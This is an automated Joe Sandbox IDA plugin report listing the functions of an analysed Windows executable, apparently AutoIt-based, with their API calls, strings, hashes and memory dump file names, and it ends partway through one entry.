Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID: ,,I
API String ID: 314563124-4163367948
Opcode ID: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
Instruction ID: be765e1d57b8148d1cf66b3d68047348fb9be163096bbb02cdfcec4a4c199039
Opcode Fuzzy Hash: 947aafcc5355d7d4454fef49f7e6cd79d9861281e848203aa0a317f96205b2d7
Instruction Fuzzy Hash: 08815D71A00109EFCB00DFA4D984EEEB7B9FF89315F204469F505AB251DB75AE0ACB64

Function 004785ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00478613
CharUpperBuffW.USER32(?,?), ref: 00478722
VariantClear.OLEAUT32(?), ref: 0047889A

Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7

Strings

Incorrect Parameter format, xrefs: 0047864B, 0047880D
AUTOIT.ERROR, xrefs: 00478728

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
Instruction ID: 60eff2204552638baa50968c5b1ec12482493ff8819337d84e8636a8f0030324
Opcode Fuzzy Hash: 7eb3f6cd446d25451a520632f830be0f78651e26610ae4c76cefc4e8c14cd634
Instruction Fuzzy Hash: E1916D756043019FC710EF25C48499BB7E4EF89718F14896EF88A9B3A2DB34ED06CB56

Function 00462A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9

_memset.LIBCMT ref: 00462B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97

Strings

0, xrefs: 00462B73

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: e0a3baeb209595a7aeaf3f34cda27616d709753c4c7b5672424de0a5229a163f
Instruction ID: 8d65d54c91bb2834d650baaa5c58db0a2d3f708132dab7008ae6ceb83fe6ffca
Opcode Fuzzy Hash: e0a3baeb209595a7aeaf3f34cda27616d709753c4c7b5672424de0a5229a163f
Instruction Fuzzy Hash: BF51DD71208B01AED7249E28DA44A6F77E8EF44314F040A2FF880D7291EBB8DC44875B

Function 00413137 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 161COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00413277
_memmove.LIBCMT ref: 00413310
_free.LIBCMT ref: 00413336
_memmove.LIBCMT ref: 004133E9

Strings

3cA, xrefs: 00413225
_A, xrefs: 00413322

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memmove$_free
String ID: 3cA$_A
API String ID: 2620147621-3480954128
Opcode ID: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
Instruction ID: 850dd104c1974142ce8a52b298ec70faaced32133f8a19a743ede36878807482
Opcode Fuzzy Hash: fc79bb831323697d85a5635729b3fd95b30c12d258a38a46f5bd99e813b77d49
Instruction Fuzzy Hash: C7518C716043418FDB24CF29C840BABBBE1FF85304F49482EE98987351DB39E941CB4A

Function 00416192 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00416248
_memmove.LIBCMT ref: 004162E4
_memset.LIBCMT ref: 00416308

Strings

3cA, xrefs: 004162AF
ERCP, xrefs: 004161B3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memset$_memmove
String ID: 3cA$ERCP
API String ID: 2532777613-1471582817
Opcode ID: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction ID: eaf8e981165fb7e982de03985e75bf568e49202a02b644e32a28802e4b47c64a
Opcode Fuzzy Hash: f26897e622874a94d3a5be45ebb38ce857f1f7ed6e3ab2c2ed74d649e7167b68
Instruction Fuzzy Hash: 02518C71A00709DBDB24DF65C9817EBB7F4AF04304F2085AFE94A86241E778EA858B59

Function 00462753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004627C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B

Strings

0, xrefs: 004627B5

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction ID: 6162d5963bf1ca612739d8e457cf9df7481532cfa70a9704744149088ee17d1e
Opcode Fuzzy Hash: 0b59e6d123104e8f486f51701735be17c722a032adafe4466648fbe3018c70b5
Instruction Fuzzy Hash: F141AE70604701AFD720EF29CD44B1BBBE4AF84314F044A2EF96597391E7B8A905CB6B

Function 0047D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0047D7C5

Part of subcall function 0040784B: _memmove.LIBCMT ref: 00407899

Strings

cdecl, xrefs: 0047D81C
none, xrefs: 0047D8A0
winapi, xrefs: 0047D836
stdcall, xrefs: 0047D847

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
Instruction ID: 0be9701992b4b91cd2e68042300235638f00ad80fed84879f118ea648425d64e
Opcode Fuzzy Hash: 85bf6583a6d5216460642c634f58536033cb8f756531c513cb924ba6ba7dc0f0
Instruction Fuzzy Hash: 783191719142159BCF00EF55CC919EEB3B4FF14324B108A2BE839A76D2DB39AD05CB95

Function 00458E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

ListBox, xrefs: 00458ED3
ComboBox, xrefs: 00458E9E

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 26bcd8e36ecd774e70687b5e39104e7c54a591b0b0fff073e1a0d1a726801d95
Instruction ID: 808fcc3072a567dbeea6ba3b2dea5d83030b8b2133ef71414da725dc7de09f99
Opcode Fuzzy Hash: 26bcd8e36ecd774e70687b5e39104e7c54a591b0b0fff073e1a0d1a726801d95
Instruction Fuzzy Hash: 1021F572A00108BEDB14ABA19C45DFF7769DF05324B10462FF825B72E2DE3D180E9A28

Function 0047182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0047184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00471872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004718A2
InternetCloseHandle.WININET(00000000), ref: 004718E9

Part of subcall function 00472483: GetLastError.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 00472498
Part of subcall function 00472483: SetEvent.KERNEL32(?,?,00471817,00000000,00000000,00000001), ref: 004724AD

Strings

, xrefs: 00471893

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
Instruction ID: 9f195ba99928d8c49214c982579914efbee4b11eb605a7749f470a37591c6317
Opcode Fuzzy Hash: 6e03d3876d11c1f4078e21f2429e25c28f700f0be32576d9d2588f00842c0ae0
Instruction Fuzzy Hash: 1021B3B15002087FE711AF65DC85EFF77EDEB48748F10812FF44992250DA688D0957AA

Function 004863E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
LoadLibraryW.KERNEL32(?), ref: 00486468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
DestroyWindow.USER32(?), ref: 00486485

Strings

SysAnimate32, xrefs: 0048643C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768

Function 00466D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
GetStdHandle.KERNEL32(0000000C), ref: 00466E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B

Strings

nul, xrefs: 00466E36

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A

Function 00466E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00466E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06

Strings

nul, xrefs: 00466F01

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A

Function 0046AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0046AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
__swprintf.LIBCMT ref: 0046ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF

Strings

%lu, xrefs: 0046ACBB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25

Function 00461142 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1

Strings

@F, xrefs: 0046119D

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID: @F
API String ID: 2875609808-2781531706
Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A

Function 0047EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
CloseHandle.KERNEL32(?), ref: 0047EDEB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49

Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0042547B
_memcpy_s.LIBCMT ref: 004254ED
__read_nolock.LIBCMT ref: 0042554B
__filbuf.LIBCMT ref: 0042556E
_memset.LIBCMT ref: 004255B2

Part of subcall function 00428B28: __getptd_noexit.LIBCMT ref: 00428B28

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
